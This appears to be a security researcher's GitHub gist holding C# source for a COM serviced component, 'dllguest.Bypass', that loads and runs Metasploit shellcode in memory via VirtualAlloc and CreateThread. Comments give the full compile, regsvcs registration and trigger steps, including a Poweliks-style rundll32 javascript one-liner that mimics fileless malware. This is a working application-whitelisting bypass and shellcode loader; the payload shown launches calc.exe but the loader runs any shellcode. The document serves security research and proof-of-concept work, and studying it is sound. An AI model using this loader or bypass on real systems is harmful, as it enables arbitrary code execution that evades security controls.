Create a gist now

Instantly share code, notes, and snippets.

@subTee /dllguest.cs Secret
Last active Dec 22, 2015

COM Serviced Component
using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:dllguest.dll /keyfile:key.snk dllguest.cs
* Click Start, point to Programs, point Visual Studio Tools, and then click Visual Studio Command Prompt.
At the command prompt, type sn -k key.snk, and then press ENTER.
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe dllguest.dll
[OR]
From Administrative x86 PowerShell
[reflection.Assembly]::LoadWithPartialName("system.enterpriseservices")
$helper = New-Object System.EnterpriseServices.RegistrationHelper
$a = 'dllguest.Bypass'
$b = $null
$helper.InstallAssembly('dllguest.dll',( [ref] $a) ,( [ref] $b), [System.EnterpriseServices.InstallationFlags]::CreateTargetApplication)
# Create the Object
$b = New-Object -ComObject dllguest.Bypass
From Jscript
var o = new ActiveXObject("dllguest.Bypass");
From VBScript
Dim obj
Set obj = CreateObject( "dllguest.Bypass" )
Poweliks Emulation
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=new%20ActiveXObject("dllguest.Bypass");
*/
[assembly: ApplicationActivation(ActivationOption.Server)]
[assembly: ApplicationAccessControl(false)]
namespace dllguest
{
[ComVisible(true)]
[Guid("31D2B969-7608-426E-9D8E-A09FC9A51680")]
[ClassInterface(ClassInterfaceType.None)]
[ProgId("dllguest.Bypass")]
[Transaction(TransactionOption.Required)]
public class Bypass : ServicedComponent
{
public Bypass() { Shellcode.Exec(); }
}
public class Program
{
static void Main(string[] args)
{
Console.WriteLine("Hello, World!");
}
}
public class Shellcode
{
public static void Exec()
{
// native function's compiled code
// generated with metasploit
// executes calc.exe
byte[] shellcode = new byte[193] {
0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,
0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,
0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,
0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,
0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,
0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,
0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,
0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,
0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,
0x8d,0x5d,0x6a,0x01,0x8d,0x85,0xb2,0x00,0x00,0x00,0x50,0x68,0x31,0x8b,0x6f,
0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,
0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,
0x00,0x53,0xff,0xd5,0x63,0x61,0x6c,0x63,0x2e,0x65,0x78,0x65,0x00 };
UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,
MEM_COMMIT, PAGE_EXECUTE_READWRITE);
Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
IntPtr hThread = IntPtr.Zero;
UInt32 threadId = 0;
// prepare data
IntPtr pinfo = IntPtr.Zero;
// execute native code
hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
WaitForSingleObject(hThread, 0xFFFFFFFF);
return;
}
private static UInt32 MEM_COMMIT = 0x1000;
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
[DllImport("kernel32")]
private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
[DllImport("kernel32")]
private static extern IntPtr CreateThread(
UInt32 lpThreadAttributes,
UInt32 dwStackSize,
UInt32 lpStartAddress,
IntPtr param,
UInt32 dwCreationFlags,
ref UInt32 lpThreadId
);
[DllImport("kernel32")]
private static extern UInt32 WaitForSingleObject(
IntPtr hHandle,
UInt32 dwMilliseconds
);
}
}
$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXsObw6RJw6HDvMOkTcO1w4/CrhwBf+KAlMOYw7XigKBzwqDDhz/DlVrCoD13IFjDrWHCq8K9ScOrFMOMwqVLJcORw6nigKbFvWnCpg5c4oCdcgZowr7Dp2XCunrCqsOpCx9JSxLCr8OvW8Oew70ZbMOVAgTihKJoZUIW4oC6wqTDqsKdcsOrw5cSwq904oCc4oCUOWMmwrY7w6jigJkjeS4+RhbDnVh6fcO3LxDigKEEZeKAncOgwrTCqsOvw5bDheKAk8W4fHTCtsK1w6/DjysyIk7DoV9ww746wqsUKC0fLMOdBmEAwpBnxbjDlMOGJkbDosOHw4MT4oKsS3vigJ49QwtoV8K/wrdKaC53w5XigKLCqhlwecOgw6nDrsK8VsODw6TDvcKtw7rDvMKvZsOhw43LnAzCt8KlfQEgesKwEcO6GWfDqGIiTVhQNMKNOE7DvcOPCcOpVMO9fgTDnQ8r4oCdAjwkwr7DqzvCo30ZUMKkxbjCp3xyw4vigLDDjB4nw5vigJzDrMOhwrfGksOzw74m4oCiw4Y3T8O+Hito4oCTw6fDqMOtRyPigKHDpcKvZAU/w73DnMOrGnzCucKyw5QtTmLDsXYWWzrDg0Mm4oC6KsW4PARRw7LDucO6wo8O4oCgw6jDgRw5wr9lIDfDq1nigKLCsSVWwq5oAzzCocOGGRx+w6xWw53igJrCkETCq3nCtcOnw74zw44gw7jDnV9NBwt1w7rCplTDuTTigKI9TTBGw7kW4oCw4oCdXsKuOcaSdcOoSSHCuhbCsx4Vw7HCqOKAk8OHw4FPPngEy5zDnMO8w7bDkEBDw4zDmyLCskV+a1jFvj1fFmkgwrt5YOKAncOnxbhxwqcyYEHDj1/Du2pwG8KBIg/DnMKlw4DDh8Kmw4/Dukhg4oCaciXDt8K2w6fDpxHDoMOMAQjDpi5LwrxfxZLDh3ICccOoWlUrwrrFvhLDq8OyV0PigKAqw7Nowq/DlsO/WMKkByB4w6TDjG/Cs8OqdeKAoTLGkhhX4oCiTE3CnSMsw45aZQ7CssKnCeKApmXCo2bCtMK+xaAPMsKvw7DCvVg3ZMOkKjXDhMKha8KlXMOZYgbigJTCpcKxInLCuOKCrMKp4oCTwrDigJw8YeKAmcOEw7HCouKApj3Dq8KlxbhtbMK2VHnDusOFxZPCs2Idw7VjNi53Yg4='
#Just Base64 Decode to Local File
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment